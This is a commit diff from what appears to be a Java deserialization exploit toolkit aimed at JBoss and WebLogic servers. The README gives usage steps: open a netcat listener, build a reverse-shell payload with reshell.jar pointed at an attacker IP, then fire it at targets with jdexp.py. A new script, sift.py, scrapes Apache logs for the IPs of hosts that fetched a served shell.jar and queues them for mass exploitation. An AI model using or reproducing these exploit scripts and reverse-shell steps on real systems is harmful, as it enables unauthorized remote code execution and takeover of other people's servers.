hackzx
diff --git a/‎README.md‎
Lines changed: 1 addition & 0 deletions b/‎README.md‎
Lines changed: 1 addition & 0 deletions
diff --git a/‎jdexp.py‎
Lines changed: 1 addition & 3 deletions b/‎jdexp.py‎
Lines changed: 1 addition & 3 deletions
diff --git a/‎old/DeserializeExploit.jar‎
45.1 MB b/‎old/DeserializeExploit.jar‎
45.1 MB
diff --git a/‎old/reshell.jar‎
548 KB b/‎old/reshell.jar‎
548 KB
diff --git a/‎payload‎
1.6 KB b/‎payload‎
1.6 KB
diff --git a/‎reshell.jar‎
8 Bytes b/‎reshell.jar‎
8 Bytes
diff --git a/‎shell.jar‎
2.1 KB b/‎shell.jar‎
2.1 KB
diff --git a/‎sift.py‎
Lines changed: 33 additions & 0 deletions b/‎sift.py‎
Lines changed: 33 additions & 0 deletions
@@ -38,6 +38,7 @@ optional arguments:
 Example:
 
 ▶ nc -vvlp 888
+▶ cp shell.jar /var/www/
 ▶ java -jar reshell.jar [ReverseIP] 888 /tmp/payload
 ▶ python jdexp.py -weblogic [RemoteIP] 7001 /tmp/payload
 ▶ python jdexp.py -jboss [RemoteIP] 80 /tmp/payload
 
@@ -39,7 +39,7 @@ def flood (matrix, start):
 
 if len(sys.argv) == 1:
 	flood (m, (0, 0) )
-	print '''\nusage: test.py [-h] [-jboss] [-weblogic] host port payload
+	print '''\nusage: jdexp.py [-h] [-jboss] [-weblogic] host port payload
 
 先用reshell.jar生成payload。
 
@@ -79,7 +79,6 @@ def jboss():
 	URL = args.host + ":" + args.port + "/invoker/JMXInvokerServlet"
 	print 'sending payload...'
 	requests.post(URL, data=payloadObj)
-	
 
 def weblogic():
 	# http://IP:7001/console/login/LoginForm.jsp
@@ -108,7 +107,6 @@ def weblogic():
 	print 'sending payload...'
 	sock.send(payload)
 
-
 if args.jboss!=True and args.weblogic!=True:
 	print "至少输入一个目标类型吧？(-jboss, -weblogic)"
 if args.jboss==True:
 
@@ -0,0 +1,33 @@
+# encoding: utf-8
+# 自動從apache的日誌中篩選請求「shell.jar」的IP。
+# 然後嘛，批量上「jdexp.py」啦。
+
+import os
+import re
+
+os.system('cat /var/log/apache2/* | grep shell.jar > /tmp/tmp')
+# if os.path.exists('')
+file = open("/tmp/tmp")
+
+for line in file.readlines():
+        p = r'(?<![\.\d])(?:\d{1,3}\.){3}\d{1,3}(?![\.\d])'
+        ip = re.findall(p, line)
+        ip = ''.join(ip) # change list to str
+        iplist = '/tmp/iplist'
+        f = open(iplist, 'a')
+        f.write(ip+'\n')
+        f.close()
+
+if os.path.exists('/tmp/iplist'):
+	os.system('cat /root/JavaDeserialization/iplist /tmp/iplist |sort |uniq >/tmp/tmp')
+	os.remove('/root/JavaDeserialization/iplist')
+	os.system('mv /tmp/tmp /root/JavaDeserialization/iplist')
+else:
+	print "ERROR: 没有找到请求shell.jar的IP。"
+
+if os.path.exists('/tmp/iplist'):
+	os.remove('/tmp/iplist')
+
+print "\n JavaDeserialization\'s IP List: \n"
+os.system('cat /root/JavaDeserialization/iplist')
+print "\r"